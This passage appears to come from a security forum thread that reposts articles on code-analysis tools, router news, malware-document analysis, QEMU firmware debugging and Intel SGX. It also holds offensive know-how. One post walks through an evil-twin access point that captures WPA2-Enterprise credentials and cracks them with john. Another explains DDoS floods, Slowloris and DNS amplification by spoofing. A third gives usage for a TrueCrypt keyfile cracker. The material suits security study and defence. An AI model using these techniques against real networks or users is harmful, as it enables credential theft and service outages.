- Limited to the Eclipse IDE only.
- The project was taken over in early 2014, but there has been no new version since 2012.

Sursa: https://www.owasp.org/index.php/OWASP_LAPSE_Project
  14. YASCA (Yet Another Source Code Analyzer) analyzes primarily Java and C/C++, along with JavaScript and other languages, for security flaws and other bugs. Its creator, Michael Scovetta, aggregated many other popular static analysis tools and made it easy to integrate with a variety of other tools, including others on this list: FindBugs, CppCheck, and more. The tool was created in 2008 to help developers look for security bugs by automating part of their code review and finding the "low hanging fruit." For more info on Yasca, check out the presentation that the creator, Michael Scovetta, gave at the NY PHP Conference in '09. The latest version, 3.0.4, was released in 2012. See the GitHub repository here.

The Good:
- Because YASCA aggregates other powerful tools, it takes the best parts of each and combines them for broader coverage.

The Not-As-Good:
- Broader does not mean deeper: keep in mind that this tool was built to look for low-hanging fruit like SQL injections and XSS, so be wary of missing more serious issues.

Sursa: https://github.com/scovetta/yasca
  15. This automated code security tool works with C++, C#, VB, PHP and Java to identify insecurities and other issues in the code. Developed by Nick Dunn (@N1ckDunn), the tool quickly scans and describes, in detail, the issues it finds, offering an easy-to-use interface.

The Good:
- Allows for custom configurations for your own queries.
- Tells you the security level of the vulnerabilities it finds.
- Searches intelligently for specific violations of OWASP recommendations.
- Consistently updated since its creation in 2012.

The Not-As-Good:
- While it can analyze many languages, you have to tell it the language you're scanning.
- Scans for a set list of vulnerabilities that cannot be modified.
- Isn't fully automated.

Sursa: SourceForge.net: VisualCodeGrepper V2.0.0 - Project Web Hosting - Open Source Software
  16. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1 and 5.3Gbps, along with gigabit ethernet, high power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation, with pushbutton connection for ease of installation and security. Both kits come with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Sursa: D-Link's new routers look crazy, but they're seriously fast
  17. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise, and I could find no real weaknesses in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to set up a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post) and set it up to use WPA2 Enterprise, with Freeradius-WPE configured as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. Freeradius-WPE came pre-installed on my laptop running Backtrack, so no real work there. About all I did was install a valid SSL certificate for use by the radius daemon. Unfortunately, I could never get Freeradius-WPE to handle the CA certificate chain correctly, and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start Freeradius-WPE on Backtrack by running "radiusd -X". The -X will cause the daemon to set up self-signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already set up in Backtrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup. 
To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based off of some searches for default configurations of hostapd, and then I researched the settings that I needed to get WPA2 Enterprise working. The critical pieces to doing that were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed at my radius server and had the correct password to access it. Last, I set my SSID to match our client's environment (or, in this example, "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone is presented with an invalid certificate, the chances are pretty high I'd get them to click through in spite of the warning. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and Freeradius-WPE captured them. The password doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example, and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file. 
Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeds with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straight forward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Sursa: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
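The hostapd.conf the author references isn't reproduced in the post text above. A reconstruction from the settings he names (wpa=1, wpa_key_mgmt=WPA-EAP, the SSID "FooBar", and a pointer at the local RADIUS server) might look roughly like this; every value not named in the post is an assumption:

```ini
# Hypothetical reconstruction: not the author's actual hostapd.conf.
interface=wlan0
driver=nl80211
ssid=FooBar
hw_mode=g
channel=6
# The post names wpa=1 and wpa_key_mgmt=WPA-EAP as the critical settings
# (note: in hostapd, wpa=2 selects pure WPA2, while wpa=1 is WPA only).
wpa=1
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# Point authentication at the local FreeRADIUS-WPE instance (assumed values).
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
```

Started, as in the post, with "hostapd hostapd.conf".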
  18. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled it into its component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me with this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that its format is that of the newer MS Office document format, i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1.

[Figure 1: Document open in 7Zip]

As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse the core contents of the document without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++. 
Figure 2 illustrates partial contents for the file "docProps/app.XML".

[Figure 2: XML contents]

Within the "word" folder, we see a number of files, including vbaData.xml and vbaProject.bin. If you remember from the PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string "word/_rels/vbaProject.bin". Within the "word/_rels" folder, there are two files...vbaProject.bin.rels and document.xml.rels...both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, document.xml.rels is perhaps the most interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred documents readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is in the structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3.

[Figure 3: vbaProject.bin file header]

Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view its contents (directories, streams), as illustrated in figure 4. 
[Figure 4: vbaProject]

Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder.

[Figure 5: Time stamp information]

Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While the time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file, may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and PowerShell script) that were created within the file system on the infected system.

Summary

My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future. 
Tools Used
- 7Zip
- Notepad++
- Hex Editor (UltraEdit)
- MiTeC Structured Storage Viewer

Resources
- Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet
- Virus Bulletin presentation (from 2009)
- Kahu Security blog post - Dissecting a Malicious Word document
- Document-Analyzer.net - upload documents for analysis

Posted by Harlan Carvey at 8:37 AM Sursa: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
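The manual walk-through above (open the OOXML container, then look for OLE-format parts like word/vbaProject.bin) can also be scripted. A minimal Python sketch, using a synthetic stand-in document rather than the actual sample:

```python
# Treat a modern MS Office ".doc(x)" as a ZIP container and flag embedded
# OLE/structured-storage parts (e.g. word/vbaProject.bin) by their magic number.
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # structured-storage header

def find_ole_parts(doc_bytes):
    """Return names of ZIP members whose first 8 bytes are the OLE magic."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        return [n for n in z.namelist() if z.read(n)[:8] == OLE_MAGIC]

# Synthetic stand-in for a malicious document; a real sample would be read
# from disk with open(path, "rb").read().
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/document.xml", "<w:document/>")
    z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)

print(find_ole_parts(buf.getvalue()))  # -> ['word/vbaProject.bin']
```

For deeper inspection of the OLE part itself (streams, macros), purpose-built tools such as the oletools package automate what the Structured Storage Viewer shows interactively.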
  19. TrueCrypt key file cracker.

[h=1]Usage[/h]

python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint

keyfiles: Possible key files directory
tcfile: TrueCrypt encrypted file
password: Password for TrueCrypt file
mountpoint: Mount point

[h=1]Example[/h]

mkdir mnt
cp a.pdf keys/
cp b.doc keys/
cp c.txt keys/
cp d.jpg keys/
cp e.gif keys/
python tckfc.py keys/ encrypted.img 123456 mnt/

Sursa: https://github.com/Octosec/tckfc
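As a rough illustration of what the -c/--combination option implies (this is a sketch of the search space, not the tool's actual code), the candidate keyfile sets grow as combinations of the files in the keys/ directory:

```python
# Sketch of the keyfile search space: every subset of the candidate files,
# up to a chosen size, is one keyfile set to try with the known password.
import itertools

def candidate_keyfile_sets(keyfiles, max_combo=1):
    """Yield every combination of keyfiles, smallest sets first."""
    for r in range(1, max_combo + 1):
        yield from itertools.combinations(keyfiles, r)

files = ["a.pdf", "b.doc", "c.txt", "d.jpg", "e.gif"]  # the example's keys/ dir
single = list(candidate_keyfile_sets(files))           # 5 one-file sets
up_to_pairs = list(candidate_keyfile_sets(files, 2))   # 5 + 10 = 15 sets
print(len(single), len(up_to_pairs))                   # -> 5 15
```

Each yielded set would then be handed to TrueCrypt as the keyfile argument(s) for a mount attempt; the combinatorial growth is why large keyfile directories get slow quickly.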
  20. [h=1]Distributed Denial Of Service (DDoS) for Beginners[/h] Distributed Denial Of Service, or DDoS, is an attack in which multiple devices send data to a target device (usually a server), with the hope of rendering the network connection or a system application unusable. There are many forms of DDoS attack, but almost all modern attacks are either at Layer 4 (the Transport Layer) or Layer 7 (the Application Layer); I'll cover both of these in depth. Although DDoS attacks can occur between almost any devices, I'll refer to the attacker as the client and the victim as the server.

[h=2]Layer 4 (Transport Layer)[/h]

TCP, UDP, SCTP, DCCP and RSVP are all examples of Layer 4 protocols; however, we'll focus on UDP as this is most commonly utilized for DDoS attacks. UDP is generally preferred over TCP-based attacks because TCP requires a connection to be made before any data can be sent; if the server or firewall refuses the connection, no data can be sent, so the attack cannot proceed. UDP allows the client to simply send data to the server without first making a connection. It's similar to the way in which mail reaches your house without your authorization: you can do whatever you want with it once you receive it, but you are still going to receive it. This is why software firewalls are useless against UDP attacks: by the time the packet has reached your server, it has already traveled through your server's datacenter. If the datacenter's router is on a 1 Gb/s connection and more than 1 Gb/s of UDP packets are being sent, the router is going to be physically unable to process them all, rendering your server inaccessible (regardless of whether the server processes the packets or not). The basic idea of a UDP flood is to saturate the connection, rather than over-stress the server by sending it too much data. 
If the attack is powerful enough, it won't even need to reach the server; it can simply overload an upstream device responsible for routing data to the target server (or even that region of the datacenter).

[Figure: The worst datacenter you ever saw.]

If we consider our hypothetical, inaccurate and oversimplified datacenter: we have a 3 Gb/s line connecting section 1 of the datacenter to the rest of the network; that 3 Gb/s line is then split into 3x 1 Gb/s lines for each of the 3 racks; each rack contains 3 servers, so each 1 Gb/s line is split into 3x 333 Mb/s lines. Let's assume all 3 servers in rack 1 have the world's best firewall; it might protect them all from DDoS, but if the attack exceeds 333 Mb/s, the server will be offline regardless; if the attack exceeds 1 Gb/s, the rack will be offline; and if the attack exceeds 3 Gb/s, the entire section will be offline. No matter how good the server's firewall is, the server will be offline if the upstream routers cripple under the load; it's theoretically possible to take offline an entire datacenter, or even a whole country, by sending a large enough attack to one server within that datacenter/country. Mitigation of UDP attacks can only be performed by the datacenter themselves, by deploying specialized routers (commonly known as hardware firewalls) at strategic points within the network. The aim is to filter out some of the DDoS traffic at stronger parts of the network, before it reaches the downstream routers. A common method of "mitigation" among lazy ISPs is to simply stop routing any traffic to the IP address being attacked (known as null routing); this results in the server being offline until the datacenter staff decide otherwise, meaning the attacker can stop attacking and enjoy a nice nap. 
[h=2]Layer 7 (Application Layer)[/h]

Layer 7 DDoS attacks are probably the easiest to carry out in terms of resources needed, because the idea is not to over-saturate the network, but to simply lock up an application on the server. Because the attack isn't taking the whole server offline, it's easy for the sysadmin to log in and begin mitigation. An example of a Layer 7 attack against a website would be to constantly send GET requests to a page which performs lots of SQL queries; most SQL servers have a limit on the number of queries they can process at one time, and any more than that and the server will have to start denying requests, preventing legitimate clients from using the website. Attackers don't even need to flood the server with requests; it's possible to simply overload the application by maintaining open connections (without sending tonnes of data). Slowloris is an example of such an attack, where the attacker opens connections to the HTTP server and sends HTTP requests bit by bit, as slowly as possible. The server cannot process a request until it's complete, so it just waits indefinitely until the entire request has been sent; once the maximum number of clients is hit, the server will just ignore any new clients until it's done with the old ones (of course, the old clients are just going to continue adding useless data to the HTTP request, keeping the connection busy for as long as they can).

[h=2]DDoS Amplification[/h]

DDoS amplification is nothing new; it has actually been around so long that Microsoft patched their OS to try and prevent attacks (I'll go over this later). Amplification attacks are nearly always UDP because it does not require a connection. UDP packets operate a lot like a letter in the mail: they have a return address (known as the source address) to which the server will reply, but as with any letter, there is no guarantee the return address matches that of whoever sent it. 
For an amplification attack to work, we first need a service that works over UDP and has a response message that is larger than the request message. A good example of this is a DNS query: the request to look up a record is only about 60 bytes, but the UDP DNS response can be as large as 4000 bytes (due to long TXT records); that's a 1:67 amplification ratio. All the attacker needs to do is find a DNS server that, when queried, will return a large response, then send a query to said DNS server with the victim's IP as the source address, resulting in the DNS server sending the response to the victim instead of the attacker. Due to the size difference between a DNS request and a DNS response, an attacker can easily transform a botnet capable of outputting 1 Gb/s worth of requests into a 60 Gb/s DDoS attack; this is a huge problem. In order to mitigate these kinds of attacks, Microsoft introduced an update to the Windows network stack in XP SP2, which prevents the system from sending UDP packets with a source address other than its own. Some ISPs took a similar approach by inspecting outgoing UDP packets and dropping any which did not contain a source address owned by the sender. As a result of such measures, amplified DDoS attacks are primarily sent from Linux servers running in datacenters that do not implement source address verification.

[h=2]Who Can Perform DDoS Attacks?[/h]

In the past, DDoS attacks were only for seasoned hackers with large botnets under their control, due to the fact that home computers don't have much bandwidth, requiring hundreds, if not thousands, of them to take a single server offline. Nowadays people can just buy (or hack) servers and use them to perform attacks; a botnet of as little as 2 servers can take offline most websites. An attacker doesn't even need to acquire their own servers; there are many services utilizing bought/hacked servers to perform DDoS attacks for as little as a $5/month subscription fee. 
It is also believed that Lizard Squad were able to take offline massive services such as PSN and XBL by abusing the Google Cloud free trial, using the virtual servers as DDoS bots. Sursa: http://www.malwaretech.com/2015/01/distributed-denial-of-service-ddos-for.html
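The amplification arithmetic in the DNS example above is easy to sanity-check; a tiny Python sketch (the 60-byte and 4000-byte figures are the post's, everything else is illustration):

```python
# Back-of-the-envelope sketch of the DNS amplification math: how many bytes
# reach the victim per byte the attacker spends on spoofed queries.
def amplification_ratio(request_bytes, response_bytes):
    return response_bytes / request_bytes

ratio = amplification_ratio(60, 4000)   # ~60-byte query, up-to-4000-byte reply
print(f"amplification ratio ~ 1:{round(ratio)}")  # the post's ~1:67 figure

# 1 Gb/s of spoofed queries reflects into roughly ratio x 1 Gb/s at the victim
# (the post rounds this down to ~60 Gb/s).
print(f"reflected flood ~ {ratio:.0f} Gb/s")
```

The ratio is why source-address validation (as in the XP SP2 change and ISP egress filtering described above) is the mitigation that matters: without spoofing, the reflection step is impossible.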
  21. Remote Debugging with QEMU and IDA Pro It's often the case, when analyzing an embedded device's firmware, that static analysis isn't enough. You need to actually execute a binary you're analyzing in order to see how it behaves. In the world of embedded Linux devices, it's often fairly easy to put a debugger on the target hardware for debugging. However, it's a lot more convenient if you can run the binary right on your own system and not have to drag hardware around to do your analysis. Enter emulation with QEMU. An upcoming series of posts will focus on reverse engineering the UPnP daemon for one of Netgear's more popular wireless routers. This post will describe how to run that daemon in system emulation so that it can be analyzed in a debugger. Prerequisites First, I'd recommend reading the description I posted of my workspace and the tools that I use. Here's a link. You'll need an emulated MIPS Linux environment. For that, I'll refer readers to my previous post on setting up QEMU. You'll also need a MIPS Linux cross compiler. I won't go into the details of setting this up because cross compilers are kind of a mess. Sometimes you need an older toolchain, and other times you need a newer toolchain. A good starting point is to build both big endian and little endian MIPS Linux toolchains using the uClibc buildroot project. In addition to that, whenever I find other cross compiling toolchains, I save them. A good source of older toolchains is the GPL release tarballs that vendors like D-Link and Netgear make available. Once you have a cross compiling toolchain for your target architecture, you'll need to build GDB for that target. At the very least, you'll need gdbserver statically compiled for the target. If you want to remotely debug using GDB, you'll need gdb compiled to run on your local architecture (e.g., x86-64) and to debug your target architecture (e.g., mips or mipsel). 
Again, I won't go into building these tools, but if you have your toolchains set up, it shouldn't be too bad. I use IDA Pro, so that's how I'll describe remote debugging. However, if you want to use gdb check out my MIPS gdbinit file: https://github.com/zcutlip/gdbinit-mips Emulating a Simple Binary Assuming you've gotten the tools described above set up and working properly, you should now be able to SSH into your emulated MIPS system. As described in my Debian MIPS QEMU post, I like to bridge QEMU's interface to VMWare's NAT interface so I can SSH in from my Mac, without first shelling into my Ubuntu VM. This also allows me to mount my Mac's workspace right in the QEMU system via NFS. That way whether I'm working in the host environment, in Ubuntu, or in QEMU, I'm working with the same workspace. zach@malastare:~ (130) $ ssh root@192.168.127.141 root@192.168.127.141's password: Linux debian-mipsel 2.6.32-5-4kc-malta #1 Wed Jan 12 06:13:27 UTC 2011 mips root@debian-mipsel:~# mount /dev/sda1 on / type ext3 (rw,errors=remount-ro) malastare:/Users/share/code on /root/code type nfs (rw,addr=192.168.127.1) root@debian-mipsel:~# cd code root@debian-mipsel:~/code# Once shelled into your emulated system, cd into the extracted file system from your device's firmware. You should be able to chroot into the firmware's root file system. You need to use chroot since the target binary is linked against the firmware's libraries and likely won't work with Debian's shared libraries. 
root@debian-mipsel:~# cd code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs/ root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/ls ./bin/ls: symbolic link to `busybox' root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/busybox ./bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked (uses shared libs), stripped root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/ls -l /bin/busybox -rwxr-xr-x 1 10001 80 276413 Sep 20 2012 /bin/busybox root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# In the above example, I have changed into the root directory of the extracted file system. Then using the file command I show that busybox is a little endian MIPS executable. Then I chrooted into the extracted root directory and ran bin/ls, which is a symlink to busybox. If you attempt to simply start a chrooted shell with "chroot .", it won't work. Your user's default shell is bash, and most embedded devices don't have bash. root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . chroot: failed to run command `/bin/bash': No such file or directory root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Instead you can chroot and execute bin/sh: root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/sh BusyBox v1.7.2 (2012-09-20 10:26:08 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # # # exit root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Hardware Workarounds Even with the necessary tools and emulation environment set up and working properly, you can still run into roadblocks. 
Although QEMU does a pretty good job of emulating the core chipset, including the CPU, the binary you're trying to run often expects hardware that QEMU can't provide. If you try to emulate something simple like /bin/ls, that will usually work fine. But something more complicated such as the UPnP daemon will almost certainly have particular hardware dependencies that QEMU isn't going to satisfy. This is especially true for programs whose job it is to manage the embedded system's hardware, such as turning wireless adapters on or off. The most common problem you will run into when running system services such as the web server or UPnP daemon is the lack of NVRAM. Non-volatile RAM is usually a partition of the device's flash storage that contains configuration parameters. When a daemon starts up, it will usually attempt to query NVRAM for its run-time configuration. Sometimes a daemon will query NVRAM for tens or even hundreds of parameters. To work around the lack of NVRAM in emulation, I wrote a library called nvram-faker. The nvram-faker library should be preloaded using LD_PRELOAD when you run your binary. It will intercept calls to nvram_get(), normally provided by libnvram.so. Rather than attempting to query NVRAM, nvram-faker will query an INI-style configuration file that you provide. The included README provides a more complete description. Here's a link to the project: https://github.com/zcutlip/nvram-faker Even with NVRAM solved, the program may make assumptions about what hardware is present. If that hardware isn't present, the program may not run or, if it does run, it may behave differently than it would on the target hardware. In this case, you may need to patch the binary. The specifics of binary patching vary from one situation to another. It really depends on what hardware is expected, and what the behavior is when it is absent. You may need to patch out a conditional branch that is taken if hardware is missing.
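To make the NVRAM workaround concrete, here's a hedged Python sketch of the behavior nvram-faker provides (the real project is a C shared library loaded via LD_PRELOAD; the key names and the exact file format below are illustrative assumptions, not taken from the real library or a real device):

```python
# Illustrative stand-in for nvram-faker's behavior: answer nvram_get()
# queries from an INI-style key=value file instead of real NVRAM.

def load_fake_nvram(text):
    """Parse simple key=value lines into a dict, skipping blanks and comments."""
    params = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        params[key.strip()] = value.strip()
    return params

def nvram_get(params, key):
    """Return the configured value, or an empty string for unknown keys."""
    return params.get(key, "")

# Hypothetical parameters a daemon might ask for at startup.
config = """
# fake NVRAM contents
lan_ipaddr=192.168.1.1
upnp_enable=1
"""

nvram = load_fake_nvram(config)
print(nvram_get(nvram, "lan_ipaddr"))  # -> 192.168.1.1
```

The point is simply that every nvram_get() a daemon issues gets a plausible answer from a file you control, so initialization can proceed without the flash partition.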
You may need to patch out an ioctl() to a special device if you're trying to substitute a regular file for reading and writing. I won't cover patching in detail here, but I did discuss it briefly in my BT HomeHub paper and the corresponding talk I gave at 44CON. Here is a link to those resources: http://shadow-file.blogspot.com/2013/09/44con-resources.html Attaching the Debugger Once you've got your binary running in QEMU, it's time to attach a debugger. For this, you'll need gdbserver. Again, this tool should be statically compiled for your target architecture because you'll be running it in a chroot. You'll need to copy it into the root directory of the extracted filesystem. # ./gdbserver Usage: gdbserver [OPTIONS] COMM PROG [ARGS ...] gdbserver [OPTIONS] --attach COMM PID gdbserver [OPTIONS] --multi COMM COMM may either be a tty device (for serial debugging), or HOST:PORT to listen for a TCP connection. Options: --debug Enable general debugging output. --remote-debug Enable remote protocol debugging output. --version Display version information and exit. --wrapper WRAPPER -- Run WRAPPER to start new programs. --once Exit after the first connection has closed. # You can either attach gdbserver to a running process, or use it to execute your binary directly. If you need to debug initialization routines that only happen once, you'll want to do the latter. On the other hand, you may want to wait until the daemon forks. As far as I know there's no way to have IDA follow forked processes. You need to attach to them separately. If you do it this way, you can attach to the already running process from outside the chroot. The following shell script will execute upnpd in a chroot. If DEBUG is set to 1, it will attach to upnpd and pause for a remote debugging session on port 1234. 
#!/bin/sh ROOTFS="/root/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs" chroot $ROOTFS /bin/sh -c "LD_PRELOAD=/libnvram-faker.so /usr/sbin/upnpd" #Give upnpd a bit to initialize and fork into the background. sleep 3; if [ "x1" = "x$DEBUG" ]; then $ROOTFS/gdbserver --attach 0.0.0.0:1234 $(pgrep upnpd) fi You can create a breakpoint right before the call to recvfrom() and then verify the debugger breaks when you send upnpd an M-SEARCH packet. Then, in IDA, go to Process Options under the Debugger menu. Set "hostname" to the IP address of your QEMU system, and set the port to the port you have gdbserver listening on. I use 1234. Accept the settings, then attach to the remote debugging session with IDA's ctrl+8 hotkey. Hit ctrl+8 again to resume execution. You should be able to send an M-SEARCH packet[1] and see the debugger hit the breakpoint. There is obviously a lot more to explore, and there are lots of situations that can come up that aren't addressed here, but hopefully this gets you started. [1] I recommend Craig Heffner's miranda tool for UPnP analysis: https://code.google.com/p/miranda-upnp/ Posted by Zach Cutlip at 3:05:00 PM Sursa: http://shadow-file.blogspot.kr/2015/01/dynamically-analyzing-wifi-routers-upnp.html
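As a small addendum: if you just want to trigger the recvfrom() breakpoint without installing miranda, a minimal SSDP M-SEARCH request can be crafted by hand. A hedged Python sketch (the HOST header and port 1900 are standard SSDP; the target address below is whatever your QEMU guest uses, not a fixed value):

```python
import socket

# Standard SSDP discovery request; the \r\n line endings and the
# trailing blank line are required by the HTTP-over-UDP format.
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: upnp:rootdevice\r\n"
    "\r\n"
).encode("ascii")

def send_msearch(target_ip, port=1900):
    """Fire a single M-SEARCH datagram at the target (e.g. the QEMU guest)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(MSEARCH, (target_ip, port))
    finally:
        sock.close()

# Example (address assumed): send_msearch("192.168.127.141")
```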
  22. Intel® Software Guard Extensions (SGX): A Researcher’s Primer Monday January 5, 2015 tl;dr Intel SGX is a trusted execution environment which provides a reverse sandbox. It’s not yet available but those who have had access to the technology have shown some powerful applications in cloud use cases that on the face of it dramatically enhance security without the performance constraints of homomorphic encryption. However, there is enough small print to warrant both validation and defensive assessment activities when the technology becomes more generally available. Introduction There is a new set of features coming to Intel CPUs that have massive potential for cloud security and other applications such as DRM. However, as with all things that can be used for good there is also the potential for misuse. These features come in the guise of Software Guard Extensions (SGX). In this post we’ve collated what we know about the technology, what others have said about it and how it is being applied in real-world applications. What is SGX? To quote Intel: Intel® Software Guard Extensions (Intel® SGX) is a name for Intel Architecture extensions designed to increase the security of software through an “inverse sandbox” mechanism. In this approach, rather than attempting to identify and isolate all the malware on the platform, legitimate software can be sealed inside an enclave and protected from attack by the malware, irrespective of the privilege level of the latter. So in short this means we can create a secure enclave (or a Trusted Execution Environment – TEE – if you wish) at the CPU level which is protected from the OS upon which it is running. Architecturally Intel SGX is a little different from ARM TrustZone (TZ). With TZ we often think of a CPU which is in two halves i.e. the insecure world and the secure world. Communication with the secure world occurs from the insecure world via the SMC (Secure Monitor Call) instruction. 
